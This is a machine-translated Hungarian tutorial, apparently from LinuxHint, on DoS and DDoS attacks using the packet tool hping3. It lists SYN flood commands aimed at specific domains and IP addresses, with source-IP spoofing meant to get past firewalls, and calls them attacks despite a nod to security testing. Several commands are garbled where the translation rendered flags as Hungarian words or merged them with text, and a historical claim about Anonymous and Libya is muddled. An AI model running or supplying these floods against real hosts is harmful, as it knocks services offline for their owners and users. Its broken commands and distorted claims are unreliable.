DOS támadások
A szolgáltatásmegtagadási (DOS) támadás nagyon egyszerű technika a szolgáltatások hozzáférhetőségének megtagadásához (ezért hívják „szolgáltatásmegtagadás” támadásnak). Ez a támadás abból áll, hogy túlterhelik a célpontot túlméretezett csomagokkal vagy azok nagy mennyiségével.
Bár ezt a támadást nagyon könnyű végrehajtani, nem veszélyezteti a célpont információit vagy magánéletét, nem átütő támadás, és csak a célhoz való hozzáférés megakadályozását célozza.
A csomagok mennyiségének elküldésével a célpont nem tudja kezelni a támadókat, megakadályozva ezzel a kiszolgálót a törvényes felhasználók kiszolgálásában.
A DOS támadásokat egyetlen eszközről hajtják végre, ezért könnyű megállítani őket a támadó IP blokkolásával, a támadó mégis megváltoztathatja, sőt becsaphatja (klónozhatja) a cél IP címet, de a tűzfalaknak nem nehéz ilyen támadásokat kezelni ellentétben azzal, ami a DDOS támadásokkal történik.
DDOS támadások
Az elosztott szolgáltatásmegtagadási támadás (DDOS) hasonló a DOS-támadáshoz, de egyszerre különböző csomópontoktól (vagy különböző támadóktól) hajtják végre. A DDOS támadásokat általában botnetek hajtják végre. A botnetek olyan automatizált szkriptek vagy programok, amelyek megfertőzik a számítógépeket egy automatizált feladat (ebben az esetben DDOS-támadás) végrehajtása érdekében. Egy hacker létrehozhat egy botnetet, és megfertőzhet sok olyan számítógépet, amelyről a botnetek DOS-támadásokat indítanak. Az a tény, hogy sok botnet egyidejűleg forgat, a DOS-támadást DDOS-támadássá változtatja (ezért hívják „elosztottnak”).
Természetesen vannak olyan kivételek, amelyekben a DDOS-támadásokat valódi emberi támadók hajtották végre, például az Anonymous hackerek csoportja, amelyet világszerte több ezer ember integrált, könnyű megvalósítása miatt nagyon gyakran alkalmazták ezt a technikát (csak önkéntesekre volt szükség, akik osztoztak ügyükben), így például Anonymous elhagyta Kadhafi líbiai kormányát az invázió során, és a líbiai állam védtelen maradt a támadók ezrei előtt világszerte.
Az ilyen típusú támadásokat, amikor sok különböző csomópontból hajtják végre, rendkívül nehéz megakadályozni és leállítani, és általában speciális hardvert igényelnek, mert a tűzfalak és a védekező alkalmazások nincsenek felkészülve több ezer támadó egyidejű kezelésére. Ez nem a hping3 esete, az ezen az eszközön végrehajtott támadások nagy részét védekező eszközök vagy szoftverek blokkolják, mégis hasznos a helyi hálózatokban vagy a rosszul védett célpontok ellen.
A hping3-ról
A hping3 eszköz lehetővé teszi manipulált csomagok küldését. Ez az eszköz lehetővé teszi a csomagok méretének, mennyiségének és széttöredezettségének szabályozását a cél túlterhelése és a tűzfalak megkerülése vagy megtámadása érdekében. A Hping3 hasznos lehet biztonsági vagy képesség-tesztelési célokra, használatával tesztelheti a tűzfalak hatékonyságát, és ha egy szerver nagy mennyiségű csomagot képes kezelni. Az alábbiakban megtalálja az utasításokat a hping3 biztonsági tesztelési célokra történő használatáról.
Első lépések a DDOS támadásokkal a hping3 használatával:
A Debian és alapú Linux disztribúciókon a hping3 futtatásával telepíthető:
# apt install hping3 -y
Egy egyszerű DOS (nem DDOS) támadás a következő lenne:
# sudo hping3 -S - árvíz -V -p 80 170.155.9.185
Hol:
sudo: szükséges jogosultságokat ad a hping3 futtatásához.
hping3: hívja a hping3 programot.
-S: meghatározza a SYN csomagokat.
-árvíz: forgasson belátása szerint, a válaszokat a rendszer figyelmen kívül hagyja (ezért nem jelennek meg a válaszok), és a csomagokat a lehető leggyorsabban elküldik.
-V: Bőbeszédűség.
-80. p .: 80-as port, ezt a számot lecserélheti a támadni kívánt szolgáltatásra.
170.155.9.185: cél IP.
Árvíz SYN csomagok használatával a 80-as port ellen:
A következő példa egy SYN támadást mutat be a lacampora ellen.org:
# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --áradás --rand-sourceHol:
Lacampora.org: a cél
-q: rövid kimenet
-n: host IP helyett cél IP-t mutat.
-d 120: állítsa be a csomag méretét
-rand-forrás: IP-cím elrejtése.
A következő példa egy másik lehetséges árvíz példát mutat be:
SYN áradás a 80-as port ellen:
# sudo hping3 --rand-source ivan.com -S -q -p 80 - áradás
A hping3 segítségével hamis IP-vel is megtámadhatja célpontjait, a tűzfal megkerülése érdekében akár maga a cél IP címe is klónozható, vagy bármilyen megengedett cím (amelyet elérhet például az Nmap vagy egy szippantó segítségével, hogy meghallgassa csatlakozások).
A szintaxis a következő lenne:
# sudo hping3 -aEbben a gyakorlati példában a támadás úgy tűnik:
# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p 80 --gyorsabban -c2
Remélem, hasznosnak találta ezt a hping3 oktatóanyagot. Kövesse a LinuxHint alkalmazást, ha további tippeket és frissítéseket szeretne kapni a Linuxról és a hálózatról.